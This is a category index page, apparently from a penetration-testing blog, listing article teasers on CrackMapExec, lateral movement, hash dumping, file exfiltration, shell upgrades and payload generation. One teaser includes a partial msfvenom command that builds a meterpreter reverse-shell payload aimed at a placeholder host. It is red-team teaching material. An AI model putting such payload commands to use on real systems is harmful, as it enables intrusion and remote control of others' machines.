Pentest

thumbnail
Burp Suite - Top Extensions

So in this article we wanted to list our favourite and most handy burp extensions! These can be installed form the burp extender, ...

thumbnail
CrackMapExec - Cheatsheet

CrackMapExec Ultimate Guide For more information on how to use CrackMapExec Check out our ultimate Guide. For installation Check t...

thumbnail
CrackMapExec - Lateral Movement (Jeff Warren)

Notes This article was written by Jeff Warren which you can find here Check out CrackMapExec Ultimate Guide & our Cheatsheet F...

thumbnail
CrackMapExec - Meterpreter shell

Notes This article was written by Jeff Warren which you can find here Check out CrackMapExec Ultimate Guide & our Cheatsheet F...

thumbnail
CrackMapExec - Ultimate Guide

CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks...

thumbnail
Dumping hashes from a Domain Controler

Top ways to dump credentials from Active Directory, both locally on the DC and remotely. While this is common during a redteam eng...

thumbnail
Transferring files

Useful for exfiltrating data or transferring payloads/tools during a redteam engagement. HTTP The best two ways transfer files fro...

thumbnail
Upgrading shells to fully interactive TTYs

Scripts info Get help for a script nmap --script-help=ssl-heartbleed Method 1: Python pty module One of my go-to commands for a lo...

thumbnail
Generating Payloads with MsfVenom

LIST PAYLOADS BINARIES Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Co...

KSEC Labs